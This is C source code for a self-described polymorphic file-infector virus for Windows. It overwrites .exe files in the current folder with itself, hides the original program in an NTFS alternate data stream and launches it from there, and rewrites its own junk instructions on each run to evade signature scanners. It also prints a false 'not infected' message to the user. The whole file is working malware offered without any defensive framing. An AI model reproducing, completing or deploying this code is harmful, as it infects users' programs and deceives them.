SpaceJunk - Polyphormic Virus

1. #include <dirent.h>
2. #include <stdio.h>
3. #include <windows.h>
4. #include <string.h>
5. #include <time.h>
6.  
7. typedef unsigned char byte;
8. typedef void (*pfunc)(void);
9.  
10. /* union for dynamic code generation and execution */
11. union funcptr {
12.   pfunc x;
13.   byte* y;
14. };
15.  
16. #define PUSH 0x50
17. #define POP  0x58
18. #define NOP 0X90
19. #define JUNK asm("PUSH %esi\n\t""PUSH %ecx\n\t""PUSH %edx\n\t""PUSH %ebx\n\t""POP %esi\n\t""POP %ecx\n\t""POP %edx\n\t""POP %ebx\n\t");
20. #define JUNKLEN 8
21.  
22. #define MAX 10
23.  
24. char *st = ".exe";
25. char *exes[MAX];
26. unsigned char *code;
27. int codelen;
28.  
29. /* function for Dynamic Code Generation and Execution */
30.  
31. void dynamic_code_gene() {
32.   int cnt;
33.   unsigned char c,reg;
34.   /* Allocating Virutal Memory which has read write and execute permissions*/
35.   byte* buf = (byte*)VirtualAllocEx( GetCurrentProcess(), 0, 1<<16, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
36.   srand(time(NULL));
37.   if( buf==0 )
38.     return;
39.   byte* p = buf;
40.   cnt = rand()%7;
41.   while(cnt)
42.   {
43.    reg = rand()%3;
44.    c = PUSH + reg;
45.   *p++ = c;
46.   *p++ = c+8;
47.    cnt--;
48.   }
49.   *p++ = 0xC3; // ret
50.   union funcptr func;
51.   func.y = buf;
52.  
53.   func.x();   // Calling the dynamic generated Code
54. }
55.  
56. /* this function reads Code from a given file name */
57.  
58. void readcode(const char *filename) {
59.   FILE *fp = fopen(filename, "rb");    
60.   fseek(fp, 0L, SEEK_END);            
61.   codelen = ftell(fp);
62.   code = malloc(codelen);              
63.   fseek(fp, 0L, SEEK_SET);
64.   fread(code, codelen, 1, fp);        
65. }
66.  
67. unsigned int sum4(int i)
68. {
69.  unsigned int sum;
70.  sum = code[i]+code[i+1]+code[i+2]+code[i+3];
71.  return sum;
72. }
73. /* function to modify the JUNK Code */
74. void replace_junk(void) {
75.   FILE *fp = fopen("vir.exe", "rb+");    
76.   fseek(fp, 0L, SEEK_END);            
77.   codelen = ftell(fp);
78.   code = malloc(codelen);              
79.   fseek(fp, 0L, SEEK_SET);
80.   fread(code, codelen, 1, fp);
81.   long int i,j;
82.   int sk;
83.   srand(time(NULL));                                
84.   int c,cnt=0;
85.   JUNK;
86.   for (i = 0; i < codelen; i++) {
87.     unsigned start = code[i];
88.     unsigned end = code[i+JUNKLEN-1];
89.     /* finds the pattern and replaces those instruction with some other random codes */
90.     if(start >= PUSH && start <= PUSH+8)
91.     {
92.       if(end >= POP && end <= POP+8)
93.     {
94.       if(sum4(i) == (sum4(i+4)-32))
95.       {
96.             cnt++;
97.         sk = i;
98.         for(j=0;j<4;j++)
99.             {
100.               int reg = rand()%8;
101.           if(reg == 4)
102.         continue;
103.               fseek(fp, sk, SEEK_SET);
104.               c = PUSH + reg;
105.           fputc(c, fp);
106.           fseek(fp, sk+4, SEEK_SET);
107.               c = c + 8;
108.           fputc(c, fp);
109.         }
110.       }
111.     }
112.      }
113.   }
114.   JUNK;
115.   //printf("The total count is %d",cnt);
116. }
117.  
118. /* finds Junk Pattern to avoid reinfecting the infected file */
119. int find_junkpattn(void)
120. {
121.   int i,cnt=0;                      
122.   JUNK;
123.   for (i = 0; i < codelen; i++) {
124.     unsigned start = code[i];
125.     unsigned end = code[i+JUNKLEN-1];
126.     if(start >= PUSH && start <= PUSH+8)
127.     {
128.       if(end >= POP && end <= POP+8)
129.     {
130.       if(sum4(i) == (sum4(i+4)-32))
131.       {
132.         cnt++;
133.       }
134.     }
135.     }
136.   }
137.   return cnt;
138. }
139.  
140. /* get .exe files in the folder */
141. int get_exes(char *str)
142. {
143.   int noofexes,i = 0;
144.   DIR           *d;
145.   struct dirent *dir;
146.   d = opendir(str);
147.   JUNK;
148.   if (d)
149.   {
150.     while ((dir = readdir(d)) != NULL)
151.     {
152.       if((strstr(dir->d_name,st)) != NULL)
153.       {
154.        //printf("%s\n", dir->d_name);
155.        exes[i] =  malloc(strlen(dir->d_name) + 1);
156.        strcpy(exes[i++],dir->d_name);
157.       }
158.     }
159.     closedir(d);
160.   }
161.   JUNK;
162.   return 0;
163. }
164. void infect(int i)
165. {
166.  char *buffer;
167.  int cx,c;
168.  c = 50;
169.  buffer = malloc(c);
170.  cx = snprintf ( buffer,c,"cmd.exe /C \"copy %s tmp.exe > nul 2>&1\"", exes[i]);
171.  system(buffer);
172.  cx = snprintf ( buffer,c,"cmd.exe /C \"copy vir.exe %s > nul 2>&1\"", exes[i]);
173.  system(buffer);
174.  cx = snprintf (buffer,c,"cmd.exe /C \"type tmp.exe > %s:org.exe\"",exes[i]);
175.  system(buffer);
176.  system("rm tmp.exe");
177.  printf("\nHey Don't worry,You are not infected\n\n");
178. }
179.  
180. /* Junk fun to insert Code randomly */
181.  
182. void jun_fn(i)
183. {
184.  while(i--)
185.  {
186.   srand(time(NULL));
187.   switch(rand()%5)
188.   {
189.    case 0:asm("PUSH %eax\n\t""POP %eax\n\t");
190.      break;
191.    case 1:asm("INC %eax\n\t""DEC %eax\n\t");
192.      break;
193.    case 2:asm("PUSH %esi\n\t""POP %esi\n\t");
194.          break;
195.    case 3:asm("INC %ebx\n\t""DEC %ebx\n\t");
196.      break;
197.    case 4:asm("NOP\n\t""NOP\n\t");
198.          break;
199.   }
200.  }
201. }  
202.  
203.  
204. int main(int argc,char *argv[])
205. {
206.   srand(time(NULL));
207.   int i=0;
208.   jun_fn(rand()%7);
209.   char *buffer;
210.   JUNK;
211.   buffer = malloc(50);
212.   JUNK;
213.   dynamic_code_gene();
214.   JUNK;
215.   for(i=0;i<MAX;i++)
216.      exes[i] = NULL;
217.   jun_fn(rand()%7);
218.   get_exes(".");
219.   i = 0;
220.   jun_fn(rand()%7);
221.   dynamic_code_gene();
222.   while(exes[i])
223.   {
224.    readcode(exes[i]);
225.    if(!(find_junkpattn()))
226.    {
227.     infect(i);
228.     if((strcmp(argv[0],"./vir")))
229.     {
230.         replace_junk();
231.         snprintf (buffer,50,"cmd.exe /C start /B %s.exe:org.exe",argv[0]);
232.         system(buffer);
233.     }
234.         break;
235.    }
236.    i++;
237.   }
238.    JUNK;
239.    
240.    return(0);
241. }